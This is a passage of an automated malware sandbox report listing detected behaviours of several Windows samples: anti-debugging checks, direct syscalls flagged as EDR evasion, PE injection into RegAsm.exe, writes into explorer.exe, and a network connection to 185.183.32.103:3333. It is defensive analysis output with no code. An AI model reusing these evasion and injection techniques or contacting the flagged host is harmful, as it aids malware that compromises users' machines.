                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeCode function: 2_2_04D90201 rdtsc 2_2_04D90201
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F1BA5 IsDebuggerPresent,OutputDebugStringW,17_2_009F1BA5
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00FA202A
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F14C0 GetProcessHeap,__Init_thread_footer,__Init_thread_footer,17_2_009F14C0
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FA6CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00926CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00926CF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00926F40 SetUnhandledExceptionFilter,1_2_00926F40
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F27E0 SetUnhandledExceptionFilter,17_2_009F27E0
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F2529 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_009F2529
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_009F264A IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_009F264A
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D63EEB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_6D63EEB8
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D63F27B IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6D63F27B
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeMemory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.183.32.103 3333
                              Found direct / indirect Syscall (likely to bypass EDR)
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeNtQuerySystemInformation: Direct from: 0x6D6A7625
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtAllocateVirtualMemory: Direct from: 0x7FFBFA0C60D4Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeNtQuerySystemInformation: Direct from: 0x6C8A7625
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeNtProtectVirtualMemory: Direct from: 0x772E037F
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtClose: Direct from: 0x2A32430
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtAllocateVirtualMemory: Direct from: 0xA0A76ACBJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtWriteFile: Direct from: 0x7FFBFA0D9822Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtAllocateVirtualMemory: Direct from: 0x7FFBFA0D9635Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeNtProtectVirtualMemory: Direct from: 0x776C7B2E
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtProtectVirtualMemory: Direct from: 0x7FFBFA0D94F5Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtClose: Direct from: 0x1C
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtProtectVirtualMemory: Direct from: 0x7FFBFA0D973AJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtQuerySystemInformation: Direct from: 0x6C006CJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeNtProtectVirtualMemory: Direct from: 0x772B8E35
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtCreateFile: Direct from: 0x7FFBFA0D97E6Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtQuerySystemInformation: Direct from: 0x7FFBFA0C6118Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeNtQuerySystemInformation: Direct from: 0x6C597625
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtClose: Direct from: 0x7FFBFA0D982C
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeNtAllocateVirtualMemory: Direct from: 0x7FFBFA0D8E14Jump to behavior
                              Injects a PE file into a foreign processes
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20000 value starts with: 4D5A
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeMemory written: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exe base: 400000 value starts with: 4D5A
                              Injects code into the Windows Explorer (explorer.exe)
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 5596 base: 2779C0 value: 55
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 1860 base: 2779C0 value: 55
                              Maps a DLL or memory area into another process
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                              Writes to foreign memory regions
                              Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2779C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20000
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20064
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A200C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2012C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20190
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A201F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20258
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A202BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20320
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20384
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A203E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2044C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A204B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20514
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20578
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A205DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20640
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A206A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20708
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2076C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A207D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20834
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20898
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A208FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20960
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A209C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20A28
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20A8C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20AF0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20B54
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20BB8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20C1C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20C80
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20CE4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20D48
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20DAC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20E10
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20E74
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20ED8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20F3C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A20FA0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21004
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21068
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A210CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21130
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21194
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A211F8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2125C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A212C0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21324
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21388
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A213EC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21450
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A214B4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21518
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2157C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A215E0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21644
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A216A8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2170C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21770
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A217D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21838
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2189C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21900
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21964
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A219C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21A2C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21A90
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21AF4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21B58
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21BBC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21C20
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21C84
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21CE8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21D4C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21DB0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21E14
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21E78
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21EDC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21F40
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A21FA4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22008
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2206C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A220D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22134
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22198
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A221FC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22260
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A222C4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22328
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2238C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A223F0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22454
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A224B8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2251C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22580
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A225E4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22648
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A226AC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22710
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22774
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A227D8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2283C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A228A0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22904
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22968
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A229CC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22A30
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22A94
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22AF8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22B5C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22BC0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22C24
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22C88
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22CEC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22D50
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22DB4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22E18
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22E7C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22EE0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22F44
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A22FA8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2300C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23070
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A230D4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23138
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2319C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23200
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23264
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A232C8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2332C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23390
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A233F4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23458
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A234BC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23520
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23584
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A235E8
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2364C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A236B0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23714
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23778
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A237DC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23840
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A238A4
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23908
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A2396C
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A239D0
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23A34
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23A98
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23AFC
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23B60
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: A23BC4
